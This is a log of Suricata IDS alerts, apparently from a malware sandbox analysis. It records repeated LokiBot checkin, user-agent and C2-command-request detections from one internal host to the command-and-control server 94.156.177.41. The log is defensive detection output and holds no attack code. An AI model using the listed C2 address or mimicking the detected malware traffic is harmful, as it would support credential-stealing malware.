Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49734 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49734 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49737 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51327 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51327 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51327 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49731 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51327 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51327 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51303 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51303 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49747 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51303 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49712 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51231 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49706 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49706 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51360 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51360 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51303 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49706 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51303 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51360 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49706 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49716 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51360 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51360 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49731 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49731 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49746 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51239 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51241 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51380 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51380 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51380 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51380 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51380 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49728 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49728 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49728 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49728 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51246 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49725 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49731 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51257 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51257 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51257 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49706 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51242 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51242 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51242 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51242 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51242 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51257 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51257 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51232 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51346 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51346 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51346 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49742 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51395 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51346 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51346 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49731 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51388 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51388 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51388 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51395 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51395 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51258 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51388 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51388 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51395 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51395 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49715 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51321 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51321 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51321 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51262 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51255 -> 94.156.177.41:80
